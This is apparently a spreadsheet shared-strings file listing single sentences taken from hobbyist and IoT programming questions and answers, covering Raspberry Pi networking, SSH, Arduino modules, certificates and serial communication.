  <si>
    <t>I would setup a reverse ssh tunnel for ssh and VNC to a computer on the raspberry:
You might implement some "watchog" which reconnects the tunnels if they should get disconnected for some reason.</t>
  </si>
  <si>
    <t>If you are
behind a reverse proxy that isnt configured or the software doesnt
support pass-through of WebSocket protocol, WebSockets wont work.</t>
  </si>
  <si>
    <t>DeviseInevitable adds support to the Rails authentication solution Devise for sending invitations by email, accepting the invitation and setting the password.</t>
  </si>
  <si>
    <t>In practice caching is used in DNS servers to overcome this problem, and as a result, root nameservers actually are involved with very little of the total traffic.</t>
  </si>
  <si>
    <t>SIP Servlets can also acts as Clients (UAC), Back to Back User Agents and Proxy SIP Entities.</t>
  </si>
  <si>
    <t>The server connection process is also very simple: the user only has to send out information about desired nickname, username, and displayed real name, before being able to use the network.</t>
  </si>
  <si>
    <t>but I also don't want user to enter pin at the time of pairing (secure comm socket won't be possible without pin exchange right?</t>
  </si>
  <si>
    <t>It does not detect rf devices (it's a problem with the basenames it uses to collect the devices: rf* is not in the list someone imagined, but you won't be debugging standard python libraries).</t>
  </si>
  <si>
    <t>Second client trying to connect should disconnect immediately.But I can't find 'max_connection' like parameter in
Allowed parameters are essid, password, channel, authmode
Is there a way to achieve this ?</t>
  </si>
  <si>
    <t>The one process kind of relies on the other as I will be updating the beacons to scan for via the open connection.</t>
  </si>
  <si>
    <t>I was thinking that I might use something like val = serial.read command like  
that will let me validate the start of my sting.</t>
  </si>
  <si>
    <t>If the Gun is detected, the LED/Buzzer should be turned on according to some specific condition.</t>
  </si>
  <si>
    <t>Now I setup MITMproxy (in transparent mode) so that I can sniff the traffic to-from from my phone apps.</t>
  </si>
  <si>
    <t>I've already googled here and there, but most of the solutions only advice to change the pg_hba.conf to trust , or assume that the user name is not exist.</t>
  </si>
  <si>
    <t>I believe it even makes the same OpenAsync call internally to ensure the connection is open.</t>
  </si>
  <si>
    <t>After some debugging I found out that the code can't find the private key in the provided pfx file and therefore can't produce a verification certificate.</t>
  </si>
  <si>
    <t>If you want your app to do another things while waiting, I reccomend you open the pipe in non-blocking mode to look for data availability without blocking your script as in following example:
Then you can send messages from bash scripts using the command 
EDIT: I can not get select.select working correctly (I used it only in C programs) so I changed my recommendation to a non-bloking mode.</t>
  </si>
  <si>
    <t>So the communication channel is using even parity, which is not decoded properly at the receiving end.</t>
  </si>
  <si>
    <t>In both cases, the system obscures related memory-addresses from the attackers.</t>
  </si>
  <si>
    <t>I get a SMTPAuthenticationError with a link to continue sign-in via a browser, which is no help for my Python script trying to send mail via smtplib.</t>
  </si>
  <si>
    <t>I want to transfer some files from my Mac to my Raspberry Pi via SSH, but when I try to find the Raspberry Pi's IP address with the ifconfig command in the lx terminal, the line which everyone says tells you the IP address is not there!, it's just gone.</t>
  </si>
  <si>
    <t>My school gave me a static IP address, sub/mask, DNS and alternate DNS in one of the outlets in my room.</t>
  </si>
  <si>
    <t>I can not find any android app that could transfer these custom codes received on Arduino.</t>
  </si>
  <si>
    <t>The code snippet is like this: 
and it failed with the log: 
Failed Create Instance : -2147221164 WinAPI Error: 1008
the error code means:
(-2147221164) Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG))
1008 means: ERROR_NO_TOKEN  
it seems the sensorManager is not available.</t>
  </si>
  <si>
    <t>Each time a barcode is scanned, an API request is sent to see if the barcode is valid or not.</t>
  </si>
  <si>
    <t>I check the fingerprint of the uploaded cert and all looks fine.</t>
  </si>
  <si>
    <t>If you have to use Handshake.None for some reason then you have to turn it on yourself by setting RtsEnable to true.</t>
  </si>
  <si>
    <t>This means that the maximum voltage for each pin is 3V; if you go above this current starts flowing through the protection diode and... you blow your device.</t>
  </si>
  <si>
    <t>1.2 Send  command change to AUTH and BOND mode.</t>
  </si>
  <si>
    <t>I do this for android apps
- owntrack
- juiceSSH
- raspicheck
- myMQTT
- openHAB
- Yatse (For Kodi remote)
But do not forget when you open a port you will need to secure it access somehow...
and your public i.p.</t>
  </si>
  <si>
    <t>A few things to check:
1) Make sure that you have network (you likely already do since you're trying to reach Firebase) e.g.</t>
  </si>
  <si>
    <t>In this case, the advertised identity must match one of the elements in the pinset.</t>
  </si>
  <si>
    <t>However, I'm finding it very difficult to do the new OAuth process.</t>
  </si>
  <si>
    <t>Only in console "1&gt;------ Deploy started: Project: Blink, Configuration: Debug Win32 ------"
I turned off all firewalls, it doesn't helped.</t>
  </si>
  <si>
    <t>I have gone through Intel Galileo datasheet but didn't find anything regarding watch dog timer.</t>
  </si>
  <si>
    <t>When i open web devicemgt i have unsecure connection like this:
no ssl.</t>
  </si>
  <si>
    <t>When it gets the device, it will start the USB Permission action to check the permission is given or not.</t>
  </si>
  <si>
    <t>Our problem is that we have to use an open network, and there is no AT-* command that does "connect to SSID without password".</t>
  </si>
  <si>
    <t>WinRT information: Bitmap shared lock taken
How to properly release this buffer?</t>
  </si>
  <si>
    <t>Since installing this crontab, I receive this error whenever I try to ssh into my pi:
I think this is because my python script hogs all the RAM on the pi so that it can't start a new ssh session.</t>
  </si>
  <si>
    <t>Mar  2 22:08:08 raspberrypi dhclient[397]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
Mar  2 22:08:08 raspberrypi sh[342]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
Mar  2 22:08:18 raspberrypi dhclient[397]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13
Mar  2 22:08:18 raspberrypi sh[342]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13
Mar  2 22:08:31 raspberrypi dhclient[397]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
Mar  2 22:08:31 raspberrypi sh[342]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
Mar  2 22:08:41 raspberrypi dhclient[397]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13
Mar  2 22:08:41 raspberrypi sh[342]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13
Mar  2 22:08:51 raspberrypi hostapd: wlan0: STA 38:a4:ed:fc:8b:b5 IEEE 802.11: associated
Mar  2 22:08:51 raspberrypi hostapd: wlan0: STA 38:a4:ed:fc:8b:b5 RADIUS: starting accounting session 5C7AD48E-00000000
Mar  2 22:08:52 raspberrypi dnsmasq-dhcp[509]: DHCPDISCOVER(wlan0) 38:a4:ed:fc:8b:b5
Mar  2 22:08:52 raspberrypi dnsmasq-dhcp[509]: DHCPOFFER(wlan0) 172.24.1.110 38:a4:ed:fc:8b:b5
Mar  2 22:08:52 raspberrypi dnsmasq-dhcp[509]: DHCPREQUEST(wlan0) 172.24.1.110 38:a4:ed:fc:8b:b5
Mar  2 22:08:52 raspberrypi dnsmasq-dhcp[509]: DHCPACK(wlan0) 172.24.1.110 38:a4:ed:fc:8b:b5 Redmi3S-nano3
Mar  2 22:08:53 raspberrypi nohup[331]: captive redirect 80 client: ::ffff:172.24.1.110
Mar  2 22:08:54 raspberrypi dhclient[397]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 4
Mar  2 22:08:54 raspberrypi sh[342]: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 4
Mar  2 22:08:58 raspberrypi dhclient[397]: No DHCPOFFERS received.</t>
  </si>
  <si>
    <t>I recently bought a32s fingerprint module for work with my arduino uno board, but I couldn't find pinout of that module.</t>
  </si>
  <si>
    <t>How can I receive the right homefolder for a certain user (in my case pi, "/home/pi/") without hacking?</t>
  </si>
  <si>
    <t>I found that:
A) Using the verified peripherals list for Pi was the first key: I had a crappy no-name webcam and it just wouldn't work.</t>
  </si>
  <si>
    <t>Both nodes don't have any open ports except for SSH.</t>
  </si>
  <si>
    <t>Make sure the firewall is opened on the appropriate ports.</t>
  </si>
  <si>
    <t>My previous answer does not take into account that the same observer might me registered with different observables.</t>
  </si>
  <si>
    <t>Run a CoAP proxy at the router with a port open to the outside, and tell your mobile device to connect through that proxy.</t>
  </si>
  <si>
    <t>You could try scanning the bus to discover all the devices and their addresses.</t>
  </si>
  <si>
    <t>So, after your AT+QMTCFG=SSL, 0, 1, 1, try using AT+QMTCFG="version",0,4, then open the connection and authenticate.</t>
  </si>
  <si>
    <t>1) Delete mongod.lock file from C:\Program
  Files\MongoDB\Server\4.0\data
2) Start mongod server
In another terminal - start mongo shell
1) mongo</t>
  </si>
  <si>
    <t>If one device is connected to the HM-10, it has to be impossible for other devices to find the HM-10 while scanning.</t>
  </si>
  <si>
    <t>When I do a telnet connection to the server (windows 10 IOT device), say "open 127.0.0.1 1023" it connects me, asking for a username.</t>
  </si>
  <si>
    <t>I am very sick of using vim in order to edit these files and tried sshfs and rmate, but have not been able to get either of these to work properly.</t>
  </si>
  <si>
    <t>EDIT:
So the issue was caused by the mysql user not having permissions to use the GPIO pins.</t>
  </si>
  <si>
    <t>Has anybody an Idea how to open the ssh, maybe over USB-Telnet, or what ever?</t>
  </si>
  <si>
    <t>Try monitoring communication between two XBee modules to see what the acknowledgement frame looks like.</t>
  </si>
  <si>
    <t>Be carefull that this opens the mysql access from every IP address.</t>
  </si>
  <si>
    <t>For you to be able to access your raspberry pi server from the internet, you need to find your external ip address.</t>
  </si>
  <si>
    <t>You can also call OpenAsync() to attempt an open.</t>
  </si>
  <si>
    <t>For example, use fcntl to change mode tty1 is in so that it cannot receive key input any longer.</t>
  </si>
  <si>
    <t>Try using AT+QMTCFG="version",&lt;"yourtcpconnectionid"&gt;,4 then open the connection and authenticate.</t>
  </si>
  <si>
    <t>404 File not found, the requested file couldn't be found.</t>
  </si>
  <si>
    <t>Everything works how it's supposed to, but the weirdest things happen on execution:
On the first loop after full execution, Servo 1 will execute its move function without authorization.</t>
  </si>
  <si>
    <t>When the standard input and output streams are being used, the input methods will not produce an error; instead, the user is repeatedly prompted for input until a legal input is entered.</t>
  </si>
  <si>
    <t>The timestamps of these events are however consistent with the timestamps of sending of the other board meaning that the packet was at least partially transmitted but somehow the magic byte got corrupted or discarded.</t>
  </si>
  <si>
    <t>To connect to the internet I had only to configure the APN once which the SIM provider gave me and write the PIN number via AT commands in the setup() function, that's all.</t>
  </si>
  <si>
    <t>right after the header, you put your data
Be aware that using structs to serialize data is not considered safe, and will often break if you cross architecture boundaries, where packing are different.</t>
  </si>
  <si>
    <t>A successful Digits account creation will return a stable userID to attach or match with your user record, and an oAuth token for the device.</t>
  </si>
  <si>
    <t>PNRP is a distributed name resolution protocol allowing Internet hosts to publish "peer names" and corresponding IPv6 addresses and optionally other information.</t>
  </si>
  <si>
    <t>Qualifying for the program requires submitting this data for a period of time before Google awards the Trusted Store status.</t>
  </si>
  <si>
    <t>This doesn't require any additional setup on the Pi, except assuming you have SSH open on your Pi (there are plenty of tutorials online on this).</t>
  </si>
  <si>
    <t>I am able to prevent the Port being opened if it doesn't exist, but once opened and data streaming in, I seem to lose all access to it.</t>
  </si>
  <si>
    <t>I am getting the error:
ERROR:: Unable to open NFC device
preceded by 
Invalid serial port: /dev/ttyACM0
I've tried using ttyS0 and ttyAMA0 since I saw those suggested to people who have had the same issue, but nweither of them work.</t>
  </si>
  <si>
    <t>Agents in bluetoothctl such as DisplayOnly, KeyboardDisplay,NoInputNoOutput, DisplayYesNo,KeyboardOnly,on either sets a dynamic passkey which has to be entered manually or confirmation the passkey or just lets any device to pair and connect without any authntication in case of NoInputNoOutput.</t>
  </si>
  <si>
    <t>By sending 131, you are putting the robot into safe mode, not full mode.</t>
  </si>
  <si>
    <t>The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks.</t>
  </si>
  <si>
    <t>I tried creating a second user which has a password and ran rpcapd from this users but still if i use these users Linux credentials, wireshark tells me it can not find any interfaces.</t>
  </si>
  <si>
    <t>The one issue is that this data is always empty, despite me having verified that an actual non-zero message is being sent.</t>
  </si>
  <si>
    <t>I tried sudo mvn -e install also, in that case build succeeded but I am not getting the popup with the URL for with registration token.</t>
  </si>
  <si>
    <t>If you want a utility to do more advanced iBeacon detection on the Raspberry Pi, check out this answer.</t>
  </si>
  <si>
    <t>The way that WPA works is, the client never reveals the password to the AP, so no AP (including the ESP) can get the password just like that, unless he can find a way to break the protocol.</t>
  </si>
  <si>
    <t>NSTokenField is a subclass of NSTextField that provides tokenized editing similar to the address field in the Mail application.</t>
  </si>
  <si>
    <t>I want to know whether any easy way using AT commands to find network registration status of SIM800?</t>
  </si>
  <si>
    <t>In Activity2, I will register the receiver again and I'm opening the port again and I'm getting the strings to do jobs.</t>
  </si>
  <si>
    <t>Without that, even if I try to force open the device with the full VISA address, it would throw another error.</t>
  </si>
  <si>
    <t>Our case is if a device overloads our IoT Hub for whatever reason, we would like to be able to revoke the connection immediately.</t>
  </si>
  <si>
    <t>I'm having trouble with the serial getting this error: 
'avrdude: ser_open(): can't open device "\.\COM5": Access is denied.'</t>
  </si>
  <si>
    <t>However, if the input file's sample formats do not match, then your data would be corrupt.</t>
  </si>
  <si>
    <t>Closing the socket is effectively like unplugging your network connection.</t>
  </si>
  <si>
    <t>The correct way to stop a service ever being enabled again is to use:
(using ttyAMA0 as the example in this case).</t>
  </si>
  <si>
    <t>But in the general case it starts to become likely at some point that you'll get corrupt data.</t>
  </si>
  <si>
    <t>Additionally, processes started with sudo belong to another user (usually root).</t>
  </si>
  <si>
    <t>Bluetooth beacons often do not send a name in the scan response.</t>
  </si>
  <si>
    <t>When HM10 is connected to remote ble device it is in transparent mode.</t>
  </si>
  <si>
    <t>So only one option is to open port 8081 to world (without nginx proxying)</t>
  </si>
  <si>
    <t>Once we have a watchdog status in the device tags, we can query devices for its status, e.g.</t>
  </si>
  <si>
    <t>Leaving permissions too open can lead to security and privacy issues.</t>
  </si>
  <si>
    <t>If parsing fails, the input will be considered invalid and appropriate action will be taken by the editor.</t>
  </si>
  <si>
    <t>In some cases StartTLS is the only way to connect to an LDAP directory, if the secure/SSL port has not been exposed.</t>
  </si>
  <si>
    <t>I have not found a solution for the ASHWID problem, but a persistent unique ID for Licensing purposes can be obtained by sending a request from the device to the following link:
The returned JSON object can be parsed to get the MAC Address which can be used as a pseudo-DeviceId.</t>
  </si>
  <si>
    <t>The website will see the key press, output the key code and actual key.</t>
  </si>
  <si>
    <t>I need this on non-interactive mode, but can only get the interactive mode working:
But i need something like this:
First command is an authentication with PIN 0000 0000 and this Looks like it is working..</t>
  </si>
  <si>
    <t>Is there any workaround to recover a device once it got timed out with establishing MQTT reconnection?</t>
  </si>
  <si>
    <t>As this is a network scanner I will not know beforehand the number of networks the ESP will find.</t>
  </si>
  <si>
    <t>The problem is that, I got certificates and keys as JSON response in the serial monitor of Arduino IDE.</t>
  </si>
  <si>
    <t>check this link to know more about redirect
Before you continue please backup your code.</t>
  </si>
  <si>
    <t>The port I was using, wasn't opened up in the Raspberry Pi's Firewall.</t>
  </si>
  <si>
    <t>You could use that_other_guy's answer but your script will still prompt you for your password (at least in my case it did).</t>
  </si>
  <si>
    <t>It's the responsibility of applications to invalidate auth tokens when they stop working so the AccountManager knows it needs to regenerate them.</t>
  </si>
  <si>
    <t>Now I can also ssh into the raspberry and run 
and I can see a browser open and do what I need on the monitor connected to the raspberry.</t>
  </si>
  <si>
    <t>You might have 's baud rate different to that of the coded one, check for that.</t>
  </si>
  <si>
    <t>If you or your system hardcoded your network interface's MAC address it could potentially cause a problem.</t>
  </si>
  <si>
    <t>Meanwhile, I can't work with Arduino and fingerprint sensors, because There is no mushc time ahead.</t>
  </si>
  <si>
    <t>Now when I open Iceweasel I have a connection and can login.</t>
  </si>
  <si>
    <t>I am trying to establish mutual X.509 certificate authentication between the MQTT client and AWS IoT.</t>
  </si>
  <si>
    <t>: aws iot describe-certificate does not include this in it output).</t>
  </si>
  <si>
    <t>No additional sensors should be necessary.</t>
  </si>
  <si>
    <t>If you use "TLS mutual authentication" you need to connect on port 8443, so in your example, it would be</t>
  </si>
  <si>
    <t>If it's not a match, this is one of the previous certificates.</t>
  </si>
  <si>
    <t>I am using an iPhone 3GS that is jailbroken to send chars to the Arduino.</t>
  </si>
  <si>
    <t>Could my sensor be faulty?</t>
  </si>
  <si>
    <t>My App sends html to a Arduino with an Ethernet Shield.</t>
  </si>
  <si>
    <t>So I wanted to use RC4 to encrypt data from PHP, and receive into the Arduino and decrypt.</t>
  </si>
  <si>
    <t>I can reach the ssh and the apache, but I can't the tomcat.</t>
  </si>
  <si>
    <t>I have attempted to modify this library to work for the WiFi shield.</t>
  </si>
  <si>
    <t>I am using jsch library for SSH connection.</t>
  </si>
  <si>
    <t>If not what alarm system would be best for use with OpenHAB?</t>
  </si>
  <si>
    <t>When I enable user login for the webapp, the Arduino data DOES NOT get sent to the google datastore.</t>
  </si>
  <si>
    <t>I am trying to connect an Intel Galileo board to a Mac via the Galileo ethernet port which connects through to a thunderbolt ethernet port on the Mac.</t>
  </si>
  <si>
    <t>What would be the ip address of my galileo so that I can ssh to it?</t>
  </si>
  <si>
    <t>tried several codes from google.. none of them are working</t>
  </si>
  <si>
    <t>Then I send 0x0C because that's the register I want to access.</t>
  </si>
  <si>
    <t>I have a D525 Intel Atom (http://www.amazon.ca/Jetway-NF38QLB-525-Generation-Intel-1-80GHz13W/dp/B00ABZRTDU) which appears to have GPIO pins.</t>
  </si>
  <si>
    <t>All the Apps knows about this other device is its ip address.</t>
  </si>
  <si>
    <t>However, I have to provide the network SSID, password and the IP address of my server.</t>
  </si>
  <si>
    <t>Does a network driver's xmit function have to block until all the data is sent?</t>
  </si>
  <si>
    <t>Password:
230 Login successful.</t>
  </si>
  <si>
    <t>How can I unload the I2C cape to expose pin P9_19 for GPIO access?</t>
  </si>
  <si>
    <t>I'm trying to send data via bluetooth from an Intel Genuino to an Intel Galileo.</t>
  </si>
  <si>
    <t>i am having a problem with my bluetooth module, am using an HC-05 FC-114 where there is no key pin but there is an EN pin.</t>
  </si>
  <si>
    <t>Once i am not connected to any network, i could not access my PI.</t>
  </si>
  <si>
    <t>Those devices will me planted and will send data to me.</t>
  </si>
  <si>
    <t>iOS application requests certificate and as a response server sends a key pair, certificatePem, certificateId and certificate Arn.</t>
  </si>
  <si>
    <t>Because if you break your ssh connection or your router has a hickup,
  your build will just stop.</t>
  </si>
  <si>
    <t>Am I sending the right certificate files for privateKey?</t>
  </si>
  <si>
    <t>I have a raspberry pi laptop with a raspberry pi 3 running Jasmine, and was wondering if I could connect to it through SSH no matter what WiFi network the Raspberry pi was connected to.</t>
  </si>
  <si>
    <t>How do I provide my own confirmation?</t>
  </si>
  <si>
    <t>I am trying to send a password from Android to Arduino using AES Algo.</t>
  </si>
  <si>
    <t>Both are detected at addresses  and 0x21.</t>
  </si>
  <si>
    <t>But I have to send my ssid and wifi password to esp.</t>
  </si>
  <si>
    <t>I installed a bitcoin node using a raspberry-pi 2 + usb stick of 128 Giga (hosting the blockchain).</t>
  </si>
  <si>
    <t>If my mac is not connected to other networks, the ssh will succeed.</t>
  </si>
  <si>
    <t>Any help is appreciated
I can get the SSID and Password form arduino 
INIT.lua 
LED_ON_OFF LUA</t>
  </si>
  <si>
    <t>Port  OK - seen and permissions.</t>
  </si>
  <si>
    <t>However my device does not have any IP-address.</t>
  </si>
  <si>
    <t>There using ifconfig I see the device is on 169.254.x.x and can use that address to ssh into it as well.</t>
  </si>
  <si>
    <t>I am trying to generate a key+certificate for connection to the AWS IoT server.</t>
  </si>
  <si>
    <t>Is there a way to do this (enable SSH) on the SD card, then insert it into the Pi, then SSH to the new IP address?</t>
  </si>
  <si>
    <t>Looking at the aws docs here the only output you can get from the certificate via CloudFormation is the ARN and the Certificate ID.</t>
  </si>
  <si>
    <t>I'm pushing data from Intel Edison onto Bluemix.</t>
  </si>
  <si>
    <t>I'm connected in ssh through a MacBookPro running on OsX 10.10.5 and charset of hpp file is bynary.</t>
  </si>
  <si>
    <t>I need to get my access_key, and a room_id and need to login my ESP8266.</t>
  </si>
  <si>
    <t>It's just the Intel Edison that fails to connect.</t>
  </si>
  <si>
    <t>Microsoft.ServiceBus: Invalid EventHub address.</t>
  </si>
  <si>
    <t>But when I want to readBlockData, no register-address seems to work.</t>
  </si>
  <si>
    <t>Next, I installed gdbserver on Raspberry Pi and attempted to connect.</t>
  </si>
  <si>
    <t>The fingerprint sensor module is ZFM-20.</t>
  </si>
  <si>
    <t>I suspect this may be something to do with my fqdn setup and/or the certificate.</t>
  </si>
  <si>
    <t>He marked an answer saying Apache wasn't having root access to the picamera and hence wasn't able to access it.</t>
  </si>
  <si>
    <t>Here is the RSTP-URL: rtsp://(user name):(password)@(ip address):554//h264Preview_01_main.</t>
  </si>
  <si>
    <t>COMException - Exception
  from HRESULT: 0x801C0003
The IP address is valid and VS can see the device.</t>
  </si>
  <si>
    <t>Login to Azure container registry
$docker login blink.azurecr.io
b.)</t>
  </si>
  <si>
    <t>I am using arduino-crypto for my ESP8266.</t>
  </si>
  <si>
    <t>This bash script sends  a command via ssh to a Raspberry Pi, which uses sshpass to access them.</t>
  </si>
  <si>
    <t>So far I can toggle and LED and scan a barcode.</t>
  </si>
  <si>
    <t>* VerboseLogging: 0 connectInner:
  hostname: 192.168.1.4   port: 22   sshConnect:
      connectSocket:
        connect_ipv6_or_ipv4:
          getsockopt indicates an error.</t>
  </si>
  <si>
    <t>Now connect = cx_Oracle.connect
  ('id,password'@'address') 
I'm trying to connect.</t>
  </si>
  <si>
    <t>fails with an AccessDeniedException.</t>
  </si>
  <si>
    <t>Im trying to sniff datapakets using Raspberry pi 3B+ with the AFLA AWUS036ACH wifi-dongle.</t>
  </si>
  <si>
    <t>currently I'm working in a fingerprint attendance system.</t>
  </si>
  <si>
    <t>I currently use x.509 certificates and the connection is working.</t>
  </si>
  <si>
    <t>(TLS connection - WiFiClientSecure).</t>
  </si>
  <si>
    <t>Than you hash the user input password to try and match them.</t>
  </si>
  <si>
    <t>The protocols in general though have this back and forth.</t>
  </si>
  <si>
    <t>You may have more luck with the permissions on /dev/.</t>
  </si>
  <si>
    <t>Break - is this legit in your system?</t>
  </si>
  <si>
    <t>The first 3 hexadecimal digits of a mac address are the vendor id.</t>
  </si>
  <si>
    <t>Thanks to @Wooble I realised that permission error had to do with the port and not the file system.</t>
  </si>
  <si>
    <t>As soneone told me is possible to have the firmware on the SD you received from microsoft.</t>
  </si>
  <si>
    <t>You provide this IP address to the RaspberryPI and it can login and authenticate the same way as on any other server.</t>
  </si>
  <si>
    <t>You can set password as eth0 hw ether mac address.</t>
  </si>
  <si>
    <t>here is an example for the bmp180 barometric sensor</t>
  </si>
  <si>
    <t>1.4 Send AT+PASS[para1] command to set passcode.</t>
  </si>
  <si>
    <t>You can use port forwarding over SSH to get from the server to the EndDevice.</t>
  </si>
  <si>
    <t>If you ssh to the server you can use two port forwards.</t>
  </si>
  <si>
    <t>On the Uno that is:
(Note that Reset cannot be masked).</t>
  </si>
  <si>
    <t>Ping does not reveal the MAC address.</t>
  </si>
  <si>
    <t>You do not need to provide IP address.</t>
  </si>
  <si>
    <t>*
Initiate an SSH login to the Raspberry Pi
Start the ConnectBot App on Android
Login to the Raspberry Pi via SSH
The only problem is that you have to know the IP address of the Raspberry Pi; it seems to be (always?)</t>
  </si>
  <si>
    <t>This is to get the IP address of your device.</t>
  </si>
  <si>
    <t>I was still getting errors after switching the authentication to "None".</t>
  </si>
  <si>
    <t>I have missed "auto eth0" before the iface statement i.e
auto eth0 
iface eth0 inet static                                          
address xxx.xxx.xxx.xxx
network 255.255.255.0
gateway xxx.xxx.xxx.xxx
dns-nameservers 8.8.8.8</t>
  </si>
  <si>
    <t>You can setup the laptop that has Pi connected to act as a network bridge.</t>
  </si>
  <si>
    <t>why would you need ssh on esp32.</t>
  </si>
  <si>
    <t>Of course the sensor isn't really faulty.</t>
  </si>
  <si>
    <t>Response to CWSAP is as below:
+CWSAP: "ssid", "pwd", "chl", "ecn", "maxconn", "ssidhidden"
ssid and pwd are your ESP's broadcast ssid and password.</t>
  </si>
  <si>
    <t>You aren't providing an address to ssh into.</t>
  </si>
  <si>
    <t>You also have excvaddr, which is the addressed you tried to access, 0x10.</t>
  </si>
  <si>
    <t>But you'll need to use WiFiClientSecure instead of WifiClient.</t>
  </si>
  <si>
    <t>In that case, just use nmap to search the subnet (the last digit of IP address), and try to login on other IPs.</t>
  </si>
  <si>
    <t>Because of that nobody knows your raspberry IP address.</t>
  </si>
  <si>
    <t>It was connected via 10, 11 pins at Ethernet shield.</t>
  </si>
  <si>
    <t>After all, it was just a mistake noticing the SSH connection.</t>
  </si>
  <si>
    <t>The module sends the credentials to the IoT Hub using a .</t>
  </si>
  <si>
    <t>ssh into the pi
ssh pi@10.42.0.182
If you get connection refused, the pi isn't running an ssh server.</t>
  </si>
  <si>
    <t>It has something to do with permissions to ports.</t>
  </si>
  <si>
    <t>Also switching from Chrome to IE, I got a login as well.</t>
  </si>
  <si>
    <t>You can send aws cognito id token when connecting to aws iot.</t>
  </si>
  <si>
    <t>Otherwise, there is no way to get the device ID via the device connection ID.</t>
  </si>
  <si>
    <t>This IP is inaccessible from the outside.</t>
  </si>
  <si>
    <t>You need to transfer this file to the Raspberry Pi so that it can recognize you as an approved user.</t>
  </si>
  <si>
    <t>If the device-name or Bluetooth-address is known you can just connect.</t>
  </si>
  <si>
    <t>Step 1.Use wifi shield or ESP8266 to connect to network.</t>
  </si>
  <si>
    <t>X.509 certificates for client authentication during TLS handshake.</t>
  </si>
  <si>
    <t>SMTPS is an extension of SMTP to secure connections with the use of SSL or TLS.</t>
  </si>
  <si>
    <t>Websockify is a WebSocket to TCP proxy/bridge.</t>
  </si>
  <si>
    <t>A thing that is not genuine; a forgery or sham.</t>
  </si>
  <si>
    <t>SMTPS is an extension of smtp to secure connections with the use of ssl or tls.</t>
  </si>
  <si>
    <t>See the examples for ListView and RecyclerView for Android or UITableView or UICollectionView for iOS
Headful authentication users with email+password, Twitter, Facebook or Google authentication.</t>
  </si>
  <si>
    <t>Perfecto Mobile
CODE &amp; DEBUG
Code, validate, debug, repeat.</t>
  </si>
  <si>
    <t>signale - Hackable console logger with beautiful output.</t>
  </si>
  <si>
    <t>Connection throttling.</t>
  </si>
  <si>
    <t>The result prints out as 
'wifi: "milt-att" ip: 0.0.0.0 COMPLETED enabled:true
If I restart the app several times I will eventually get a legitimate ip address.</t>
  </si>
  <si>
    <t>As of Windows 10, Edge is the new default browser, but IE11 will continue to get security patches until the operating system reaches end of life.</t>
  </si>
  <si>
    <t>The act of making it difficult for an automated system to read and respond to the CAPTCHA also makes it more difficult for many users with disabilities to access sites that use them.</t>
  </si>
  <si>
    <t>SD card is not inserted (works fine with ~29% used), verification/build/upload succeeds in both cases.</t>
  </si>
  <si>
    <t>However, as of posting this, as far as I know, there is no Arduino library that supports this authentication for firebase directly, so I wanted to find an other way to make it work.</t>
  </si>
  <si>
    <t>Current Arduino code (actual ssid, password and API key and number removed):</t>
  </si>
  <si>
    <t>Open SSH is set up and working properly, and functions as expected when I drop the config down to just g_ether.</t>
  </si>
  <si>
    <t>In the other hand, I have also found sketches that ONLY makes the temp/humi functionality, withouth having the chance to write the Activation Keys.</t>
  </si>
  <si>
    <t>The commands to open/lock the door will be part of the reply of an HTTP GET request.</t>
  </si>
  <si>
    <t>In another case you can also hide your wireless network, which can become visible when you search for the requested SSID.</t>
  </si>
  <si>
    <t>The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 35,000 in total (as of April 2014).</t>
  </si>
  <si>
    <t>[EDIT]
I've done a lot more research and work and from advice from security.stackexchange I decided to use AES to do the encryption.</t>
  </si>
  <si>
    <t>Unfortunately my knowledge is insufficient (been trying for 2 days now) to implement the fix, since I have the same problem (need to login to capture portal on SSL for wifi access), but hopefully I will soon find out.</t>
  </si>
  <si>
    <t>A method for exposing localization bugs before the actual translation work has begun.</t>
  </si>
  <si>
    <t>(more details here)
In general, activating screen-pinning-mode requires user confirmation.</t>
  </si>
  <si>
    <t>Dropped connections can indicate you're trying to do something illegal, such as publishing to a topic you're not allowed to.</t>
  </si>
  <si>
    <t>Now the hardware side of this isn't the issue i have created a program that responds to arrow key inputs and i can control the motors on the pi through a ssh connection.</t>
  </si>
  <si>
    <t>This suggests to me that lighttpd requires some form of permission to access the image however I am not sure if this is the case and how I would go about rectifying this.</t>
  </si>
  <si>
    <t>I already tried using privileged mode, addind /dev/gpiomem as a device and adding /sys/class/gpio as a volume.</t>
  </si>
  <si>
    <t>You write in the comment for the first while loop that it eill be bypassed if the pin is not high.</t>
  </si>
  <si>
    <t>The relevant address is stored in the EXCVADDR register - which in this case we can see is 0x00000055.</t>
  </si>
  <si>
    <t>Ideally without having to open up firewall ports (dummy proof).</t>
  </si>
  <si>
    <t>Assuming you only need one-way communication, open the ssh connection with  instead of system.</t>
  </si>
  <si>
    <t>I would a add check to make sure the file was opened successfully.</t>
  </si>
  <si>
    <t>Basically from the connection string which we get it from Azure portal doesn't include device id.</t>
  </si>
  <si>
    <t>You have to start an account there and log in, but they do have a sample app, which is a great way to get started with the Core Bluetooth Framework.</t>
  </si>
  <si>
    <t>https://docs.oracle.com/javase/7/docs/api/java/util/StringTokenizer.html
I am checking the library Adafruit_NeoMatrix but I can't find all the functions available.</t>
  </si>
  <si>
    <t>I checked and found it was libssl-dev.</t>
  </si>
  <si>
    <t>My Seeed Studios Ethernet Shield v2.4 was reporting incorrect IP addresses.</t>
  </si>
  <si>
    <t>Bytes in Java are signed, not the most bone-headed decision I've ever seen but it comes close.</t>
  </si>
  <si>
    <t>This is much safer than opening up a port to Kodi on your router.</t>
  </si>
  <si>
    <t>If not, you may need to refine your use case or look at alternate techniques like RSSI fingerprinting.</t>
  </si>
  <si>
    <t>You dont open the port as you would in a router but rather activate modbus connectivity in the PLC.</t>
  </si>
  <si>
    <t>I will ACK back the key (will encrypt that in a much simpler way ;))</t>
  </si>
